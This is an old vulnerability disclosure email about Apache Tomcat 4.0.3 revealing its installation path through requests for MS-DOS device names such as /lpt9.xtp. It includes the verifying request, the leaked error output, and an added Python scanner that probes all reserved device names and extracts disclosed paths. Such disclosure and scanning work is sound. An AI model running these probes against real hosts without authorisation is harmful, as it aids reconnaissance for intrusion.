[This was originally sent to CVE and Nikto and then published on OSVDB, which is now gone. It was discovered in an old version of Apache Tomcat, and the fix had already existed for several years. VulnDB 20033]
From: security curmudgeon
To: Steven Christey, Sullo of Nikto
Date: Thu, 13 Oct 2005 14:21:33 -0400 (EDT)
Subject: Apache Tomcat 4.0.3 MS-DOS Device Request Path Disclosure
Didn’t see this in CVE or OSVDB. There is a known issue with several web servers, including Resin, where requesting a file that matches an MS-DOS file name makes the server error out. Such errors will sometimes include installation path information.
While testing a few servers, the Nikto check for this triggered, but the server wasn’t Resin:
Nikto check that triggered:
- OSVDB-0: GET /lpt9.xtp : Resin 2.1 reveals the server path when a DOS device is requested.
Actual server:
- Server: Apache Tomcat/4.0.3 (HTTP/1.1 Connector)
To verify:
http://[target]:5225/lpt9.xtp
Apache Tomcat/4.0.3 – HTTP Status 500 – Internal Server Error
type Exception report
message Internal Server Error
description The server encountered an internal error (Internal Server Error) that prevented it from fulfilling this request.
exception
java.io.FileNotFoundException: C:\Program Files\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\ROOT\lpt9.xtp (The system cannot find the file specified)
at java.io.FileInputStream.open(Native Method)
at java.io.FileInputStream.<init>(Unknown Source)
at java.io.FileInputStream.<init>(Unknown Source)
[..]
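A scanner check for this class of disclosure, added here as an example in Python; it is not code from the original report and not Nikto's own check. It goes beyond the single /lpt9.xtp request above and tries every Windows reserved device name (CON, PRN, AUX, NUL, COM1-9, LPT1-9) with a few extensions. The extension list, the probe_server helper, the path regex and the embedded sample response (constructed from the Tomcat 4.0.3 error shown above) are this example's own assumptions.

```python
"""Probe a web server for MS-DOS device name path disclosure.

Added example: not the original report's code and not Nikto's check.
"""
import re
import sys
import urllib.error
import urllib.request

# Windows reserved device names; the OS rejects them as file names whatever the extension.
DOS_DEVICES = (["CON", "PRN", "AUX", "NUL"]
               + [f"COM{i}" for i in range(1, 10)]
               + [f"LPT{i}" for i in range(1, 10)])

# .xtp is what the Nikto Resin check used; the other extensions are assumptions.
EXTENSIONS = [".xtp", ".jsp", ".txt", ".html"]

# Absolute Windows path: drive letter, then directory components (spaces allowed,
# each ending in a backslash), then a final file name with no whitespace, so the
# match stops before "(The system cannot find the file specified)".
WIN_PATH_RE = re.compile(r'[A-Za-z]:\\(?:[^\\\r\n<>"|?*]+\\)*[^\\\s<>"|?*()]+')

# Constructed sample body, modelled on the Tomcat 4.0.3 error page quoted in the report.
SAMPLE_RESPONSE = (
    "<html><head><title>Apache Tomcat/4.0.3 - Error report</title></head><body>"
    "<h1>Apache Tomcat/4.0.3 - HTTP Status 500 - Internal Server Error</h1>"
    "<b>exception</b> <pre>java.io.FileNotFoundException: "
    "C:\\Program Files\\Hewlett-Packard\\Toolbox2.0\\Apache Tomcat 4.0\\webapps\\ROOT\\lpt9.xtp"
    " (The system cannot find the file specified)\n"
    "\tat java.io.FileInputStream.open(Native Method)\n"
    "\tat java.io.FileInputStream.&lt;init&gt;(Unknown Source)\n"
    "</pre></body></html>"
)


def probe_paths(devices=DOS_DEVICES, extensions=EXTENSIONS):
    """Request paths to try, e.g. '/lpt9.xtp'."""
    return [f"/{d.lower()}{e}" for d in devices for e in extensions]


def extract_disclosed_paths(body, request_path):
    """Absolute Windows paths in body whose file name is the one we requested.

    Requiring the file name to match keeps unrelated paths (banners, other
    stack frames) from being reported as a disclosure.
    """
    wanted = request_path.rsplit("/", 1)[-1].lower()
    hits = []
    for m in WIN_PATH_RE.finditer(body):
        path = m.group(0)
        if path.rsplit("\\", 1)[-1].lower() == wanted:
            hits.append(path)
    return hits


def disclosed_directory(path):
    """Directory part of a disclosed path, i.e. the document root that leaked."""
    return path.rsplit("\\", 1)[0]


def probe_server(base_url, timeout=10):
    """Try every probe path against base_url (e.g. 'http://target:5225').

    Returns {request_path: [disclosed paths]} for responses that leak one.
    A 500 makes urllib raise HTTPError; its body is the error page we want.
    """
    findings = {}
    for p in probe_paths():
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + p, timeout=timeout) as r:
                body = r.read().decode("latin-1", "replace")
        except urllib.error.HTTPError as e:
            body = e.read().decode("latin-1", "replace")
        except (urllib.error.URLError, OSError):
            continue
        hits = extract_disclosed_paths(body, p)
        if hits:
            findings[p] = hits
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for req, paths in probe_server(sys.argv[1]).items():
            print(f"{req}: {paths}")
    else:
        # Offline demonstration against the constructed sample response.
        for hit in extract_disclosed_paths(SAMPLE_RESPONSE, "/lpt9.xtp"):
            print(f"leaked document root: {disclosed_directory(hit)}")
```

Run it with a base URL to probe a live host, or with no arguments to see the parser pick the path out of the sample page. A server that answers every probe with a plain 404 and no path yields an empty result; only a body carrying an absolute path whose file name equals the requested device name counts.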